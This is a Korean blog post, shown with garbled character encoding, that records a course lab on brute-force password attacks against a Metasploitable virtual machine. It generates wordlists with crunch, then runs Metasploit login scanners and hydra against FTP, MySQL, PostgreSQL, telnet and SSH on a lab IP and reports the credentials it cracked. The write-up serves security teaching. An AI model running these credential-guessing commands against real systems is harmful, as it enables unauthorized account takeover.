! ์ด ํฌ์คํธ์ ๋ด์ฉ์ ์ ๊ณต ๊ฐ์์์ ๋ค๋ฃฌ ๋ฆฌ๋ ์ค ๋ณด์ ์ค์ต์ ๊ธฐ๋ก์ฉ์ด๋ฉฐ, ์ด๋ ํ์ต ๋ชฉ์ ์ผ๋ก๋ง ์ฌ์ฉ๋์ด์ผ ํฉ๋๋ค.
! ์ด๋ ํ ๊ฒฝ์ฐ์๋ ์ด๋ฌํ ๊ธฐ์ ์ ์ ์ฉํ๊ฑฐ๋ ๋ถ๋ฒ์ ์ธ ํ๋์ ์ฌ์ฉํด์๋ ์ ๋ฉ๋๋ค.
! ๋ชจ์ ํดํน๊ณผ ๊ด๋ จ๋ ์ค์ต์ ํฉ๋ฒ์ ์ธ ํ๊ฒฝ์์๋ง ์ํ๋์ด์ผ ํ๋ฉฐ, ๋ฌด๋จ์ผ๋ก ๋ค๋ฅธ ์ฌ๋์ ์์คํ ์ ์ ๊ทผํ๋ ๋ฑ์ ํ์๋ ๋ฒ์ ์ธ ๋ฌธ์ ๋ก ์ด์ด์ง ์ ์์ต๋๋ค. ์ด๋ฌํ ๊ธฐ์ ์ ์ฌ์ฉํ ๋์๋ ํญ์ ์ค๋ฆฌ์ ์ธ ์ฑ ์์ ๊ฐ๊ณ ํ๋ํด์ผ ํฉ๋๋ค.
๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ์ด๋?
๊ฐ๋ฅํ ๋ชจ๋ ์กฐํฉ์ ํค๋ ๋น๋ฐ๋ฒํธ๋ฅผ ์ฒด๊ณ์ ์ผ๋ก ์๋ํ์ฌ ์ฌ๋ฐ๋ฅธ ๊ฐ์ ์ฐพ์๋ด๋ ๋ฐฉ์์ด๋ค. ์ด ๊ณต๊ฒฉ์ ๋จ์ํ์ง๋ง, ๊ฐ๋ ฅํ ์ํธํ ๋๋ ์ถฉ๋ถํ ๊ธด ๋น๋ฐ๋ฒํธ๋ฅผ ์ฌ์ฉํ๋ ๊ฒฝ์ฐ ์๊ฐ๊ณผ ์์ ๋ฉด์์ ๋นํจ์จ์ ์ผ ์ ์๋ค.
์ค์ต ํ๊ฒฝ
์ด ์ค์ต์์๋ ๋ชจ์ ์นจํฌ ์ฐ์ต์ ์ํด Metasploitable์ ์ฌ์ฉํ๋ค.
Metasploitable์ ๋ณด์ ์ฐ๊ตฌ ๋ฐ ๊ต์ก ๋ชฉ์ ์ผ๋ก ์ฌ์ฉ๋๋ ์ทจ์ฝํ ๊ฐ์ ๋จธ์ ์ด๋ค. Metasploitable์ ์๋์ ์ผ๋ก ์ฌ๋ฌ ๋ณด์ ์ทจ์ฝ์ ์ ํฌํจํ๊ณ ์์ด, ์ค์ ํ๊ฒฝ์์ ํดํน ์ฐ์ต์ ํ๊ณ ๋ณด์ ํด์ ํ ์คํธํ๋ ๋ฐ ์ ์ฉํ๋ค.
MySQL ๋ฐ์ดํฐ๋ฒ ์ด์ค root ๋น๋ฐ๋ฒํธ ๋ณ๊ฒฝ
~$ mysql -u root -p
> use mysql;
> update user set password=password('1234') where user='root';
> flush privileges;
Crunch ๊ธฐ๋ฅ์ ์ด์ฉํ์ฌ ๊ณต๊ฒฉ์ฉ ํจ์ค์๋ ์์ฑ
~# cat /usr/share/crunch/charset.lst
charset.lst๋ crunch๋ผ๋ ๋น๋ฐ๋ฒํธ ์์ฑ ๋๊ตฌ์์ ์ฌ์ฉํ๋ ๋ฌธ์ ์งํฉ ๋ชฉ๋ก์ ํฌํจํ๊ณ ์๋ค. ์ด ํ์ผ์ ๋ค์ํ ๋ฌธ์ ์งํฉ์ ์ ์ํ์ฌ ์ฌ์ฉ์๊ฐ ์ํ๋ ๋น๋ฐ๋ฒํธ ํจํด์ ๋ง์ถฐ ๋น๋ฐ๋ฒํธ๋ฅผ ์์ฑํ ์ ์๊ฒ ํ๋ค.
~# crunch 1 6 -f /usr/share/crunch/charset.lst numeric -o /root/passwords_6.txt
crunch ๋๊ตฌ๋ฅผ ์ฌ์ฉํ์ฌ ์ซ์๋ก ๊ตฌ์ฑ๋ 1~6 ๊ธธ์ด์ ๋ชจ๋ ๊ฐ๋ฅํ ๋น๋ฐ๋ฒํธ ์กฐํฉ์ ์์ฑํ๊ณ , ๊ทธ ๊ฒฐ๊ณผ๋ฅผ ํ์ผ๋ก ์ ์ฅํ๋ค.
ํ์ผ์๋ 0๋ถํฐ 999999๊น์ง์ ๋น๋ฐ๋ฒํธ๊ฐ ์ ์ฅ๋๋ค.
~# cat >> /root/passwords_6.txt
cat ๋ช ๋ น์ด๋ก ํจ์ค์๋ ํ์ผ์ postgres ํจ์ค์๋๋ฅผ ์ถ๊ฐํ๋ค.
user.txt๋ผ๋ ์ด๋ฆ์ ๊ณต๊ฒฉ ๋์ ID๊ฐ ์ ์ฅ๋ ํ์ผ์ ์์ฑํ๋ค.
0๋ถํฐ 999999๊น์ง ์ซ์๋ฅผ ๋ชจ๋ ๋์ ํ๊ธฐ์๋ ๋ง์ ์๊ฐ์ด ๊ฑธ๋ฆฌ๋ฏ๋ก ๋น ๋ฅธ ์ค์ต์ ์ํด ๊ฐ๋จํ ํจ์ค์๋ ํ์ผ์ ์์ฑํ๋ค.
Metasploitable 'FTP ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (Msfconsole ์ด์ฉ)
์ ๋ช ๋ น์ด๋ FTP ๋ก๊ทธ์ธ ์๋๋ฅผ ์๋ํํ๋ ๊ณผ์ ์ด๋ค. ์ด ์ค์บ๋๋ ์ฃผ์ด์ง ์ฌ์ฉ์๋ช ๊ณผ ๋น๋ฐ๋ฒํธ ๋ฆฌ์คํธ๋ฅผ ์ฌ์ฉํ์ฌ ์ง์ ๋ FTP ์๋ฒ์ ๋ํด ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ์ ์ํํ๋ค.
> use auxiliary/scanner/ftp/ftp_login
> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
> use auxiliary/scanner/ftp/ftp_login : FTP ๋ก๊ทธ์ธ ์๋๋ฅผ ์ํ ์ค์บ๋ ๋ชจ๋์ ์ ํ
> set rhosts 192.168.255.148 : ๊ณต๊ฒฉ ๋์ IP ์ฃผ์๋ฅผ ์ค์
> set user_file /root/users.txt : ์์์ ์์ฑํ๋ ๊ณต๊ฒฉ๋์ ID ๋ฆฌ์คํธ๊ฐ ํฌํจ๋ ํ์ผ์ ๊ฒฝ๋ก๋ฅผ ์ค์
> set pass_file /root/password_short.txt : ์์์ ์์ฑํ๋ ๋น๋ฐ๋ฒํธ ํ์ผ์ ๊ฒฝ๋ก๋ฅผ ์ค์
> set stop_on_success true : ๋ก๊ทธ์ธ ๊ณต๊ฒฉ์ ์ฑ๊ณตํ๋ฉด ๊ณต๊ฒฉ์ ์ค์งํ๋๋ก ์ค์
> set threads 256 : ์ค๋ ๋ ์ ์ค์
> run : ์คํ
๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ ์ค ID๋ postgres, ํจ์ค์๋๋ postgres๋ก ๋ก๊ทธ์ธ์ด ์ฑ๊ณตํ์ฌ ์ข ๋ฃ๋ ๊ฒ์ ๋ณผ ์ ์๋ค.
Metasploitable 'MySQL ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (Msfconsole ์ด์ฉ)
FTP ์๋ฒ ์ธ์๋ ๋ค๋ฅธ ์๋ฒ๋ค๋ก ๋ฌด์ฐจ๋ณ ๋์ ์ ํตํด ๊ณต๊ฒฉ์ ์ํํด ๋ณด์๋ค.
๋จผ์ MySQL ์๋ฒ์ด๋ค. ๋ช ๋ น์ด๋ ๋์ผํ๋ฉฐ ์ค์บ๋ ๋ชจ๋ ์ ํ ์ mysql/mysql_login ๋ชจ๋์ ์ ํํ๊ณ , 3306์ผ๋ก ํฌํธ๋ฅผ ์ง์ ํ๋ค.
> use auxiliary/scanner/mysql/mysql_login
> set rhosts 192.168.255.148
> set rport 3306
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ ์ค ID๋ root, ํจ์ค์๋๋ 1234๋ก ๋ก๊ทธ์ธ์ด ์ฑ๊ณตํ์ฌ ์ข ๋ฃ๋ ๊ฒ์ ๋ณผ ์ ์๋ค.
Metasploitable 'postgreSQL ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (Msfconsole ์ด์ฉ)
> use auxiliary/scanner/postgres/postgres_login
> set rhosts 192.168.255.148
> set rport 5432
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
Metasploitable 'telnet ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (Msfconsole ์ด์ฉ)
> use auxiliary/scanner/telnet/telnet_login
> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
Metasploitable 'SSH ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (Msfconsole ์ด์ฉ)
> use auxiliary/scanner/ssh/ssh_login
> set rhosts 192.168.255.148
> set user_file /root/users.txt
> set pass_file /root/password_short.txt
> set stop_on_success true
> set threads 256
> run
Metasploitable 'FTP ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (hydra ์ด์ฉ)
~# hydra -l postgrs -P /root/password_short.txt -f 192.168.255.148 ftp
Metasploitable 'SSH ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (hydra ์ด์ฉ)
~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 ssh
Metasploitable 'telnet ์๋ฒ' ๋ฌด์ฐจ๋ณ ๋์ ๊ณต๊ฒฉ (hydra ์ด์ฉ)
~# hydra -l root -P /root/password_short.txt -f 192.168.255.148 telnet
'๐ Security > ๋ชจ์ ํดํน' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
[๋ชจ์ ํดํน] ๋ฒํผ ์ค๋ฒํ๋ก์ฐ ๊ณต๊ฒฉ ์ค์ต (0) | 2024.06.03 |
---|---|
[๋ชจ์ ํดํน] ์๋์ฐ8 ์ฌ๋ถํ ์ ์ ์ฑ์ฝ๋ ์คํ (0) | 2024.03.05 |
[๋ชจ์ ํดํน] ์๋์ฐ8/์๋์ฐ10 OS ์นจํฌ ์์ (0) | 2024.03.05 |
[๋ชจ์ ํดํน] ์๋์ฐ7 OS ์นจํฌ ์์ (1) | 2024.03.05 |